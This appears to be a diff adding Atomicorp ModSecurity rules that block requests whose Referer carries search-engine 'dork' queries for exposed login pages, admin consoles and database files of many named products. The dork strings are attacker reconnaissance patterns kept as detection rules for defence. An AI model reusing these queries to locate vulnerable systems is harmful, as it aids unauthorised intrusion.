+SecRule REQUEST_HEADERS:Referer   "inurl:ojspdemos" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371656,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:j2ee/examples/jsp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:backup intitle:index\.of inurl:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371663,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/dana-na/auth/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371672,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "remote supervisor adapter ii inurl:userlogin_logo\.ssi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371673,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/\?pagename=customerlogin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371677,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to @mail \(ext:pl \| inurl:index\) -dwaffleman" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371681,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "surgemail inurl:/cgi/user\.cgi ext:cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371682,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:shoutcast administrator inurl:admin\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371688,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/slxweb\.dll/external\?name=\(custportal\|webticketcust\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371695,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to @mail \(ext:pl \| inurl:index\) -dwaffleman" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371700,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:2000 intitle:remotelyanywhere -site:realvnc\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371703,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ids5web" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371705,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ovislink inurl:private/login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371708,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:3300 integrated communications platform inurl:main\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/merchant2/admin\.mv \| inurl:/merchant2/admin\.mvc \| intitle:miva merchant administration login -inurl:cheap-malboro\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371714,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:webvpn\.html login please enter your" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371717,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:novell web services groupwise -inurl:doc/11924 -\.mil -\.edu -\.gov -filetype:pdf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371722,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ocw_login_username" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:supero doctor iii -inurl:supermicro" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login forum powered by anyboard intitle:if you are a new user in(?:text|body):forum powered by anyboard inurl:gochat -edu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371733,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to the forums - @www\.aimoo\.com inurl:login\.cfm\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371734,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modcp/ in(?:text|body):moderator\+vbulletin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371736,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "login prompt inurl:gm\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371738,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cscreatepro\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371747,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):welcome to inurl:cp intitle:h-sphere inurl:begin\.html -fee" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371764,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:xcauctionlite \| driven by xcent lite inurl:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371765,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:visnetic webmail inurl:/mail/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371767,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/susadmin intitle:microsoft software update services" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371768,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:exchweb/bin/auth/owalogon\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371769,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:citrix/metaframe/default/default\.aspx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371770,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl::2082/frontend -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371771,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:open-xchange inurl:login\.pl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371773,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:gnatsweb\.pl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371775,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:zope help system inurl:helpsys" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371778,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):vbulletin inurl:admincp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371782,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:endymion\.saké\.mail\.login\.page \| inurl:sake\.servlet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371783,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:bin\.welcome\.sh \| inurl:bin\.welcome\.bat \| intitle:ehealth\.5\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371784,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:vmware management interface: inurl:vmware/en/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371789,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:webmail\./index\.pl interface" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371790,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wps/portal/ login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371792,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:suse/login\.pl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371793,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wcp_user" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371796,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:orasso\.wwsso_app_admin\.ls_login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:usysinfo\?login=true" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371803,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:631/admin \(inurl:op=\*\) \| \(intitle:cups\) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371808,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:activex/default\.htm demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371810,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:1810 oracle enterprise manager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371816,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:weblogic server intitle:console login inurl:console" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371817,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:1220/parse_xml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371819,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:coranto\.cgi intitle:login \(authorized users only\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371824,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/webedit\.\* in(?:text|body):webedit professional -html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371825,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:irc filetype:cgi cgi:irc" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371829,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/dana-na/auth/welcome\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371833,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "opensrs domain management inurl:manage\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371835,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:confixx inurl:login\|anmeldung" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371841,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:calendar\.asp\?action=login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371842,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:default\.asp intitle:webcommander " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371847,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:omail-admin administration login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371849,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:microsoft certificate services inurl:certsrv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371850,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:mewebmail" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371851,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:administrator welcome to mambo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371854,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "login to usermin inurl:20000" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371858,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:gs/adminlogin\.aspx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371863,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin/ultimatebb\.cgi\?ubb=login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371869,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cgi-bin/sqwebmail\?noframes=1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371874,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(inurl:ars/cgi-bin/arweb\?o=0 \| inurl:arweb\.jsp\) -site:remedy\.com -site:mil" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371875,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:utilities/treeview\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371877,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cgi inurl:irc\.cgi \| intitle:cgi:irc login " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371882,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:exchange/logon\.asp or intitle:microsoft outlook web access - logon" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371883,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/eprise/ " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371889,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:login filetype:swf swf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371892,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:webadmin filetype:nsf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371893,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/citrix/nfuse17/ " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371895,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:metaframexp/default/login\.asp \| intitle:metaframe xp login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371896,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:names\.nsf\?opendatabase" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371897,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:remote\.desktop\.web\.connection inurl:tsweb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371898,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "vnc desktop inurl:5800" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371900,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/admin/login\.asp " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371901,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:login\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371902,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl::10000 in(?:text|body):webmin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371903,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:login\.cfm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371904,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:exchange/logon\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371906,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:midicart\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371910,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:shopdbtest\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371912,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/database/comersus\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371913,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:shopadmin\.asp shop administrators only" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371914,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:nmconsole/login\.asp \| intitle:login - ipswitch whatsup professional 2005 \| in(?:text|body):ipswitch whatsup professional 2005 \(sp1\) ipswitch" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371919,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:crazywwwboard\.cgi in(?:text|body):detailed debugging information" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371920,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ovcgi/jovw" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371921,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:proxy \| inurl:wpad ext:pac \| ext:dat findproxyforurl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371922,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
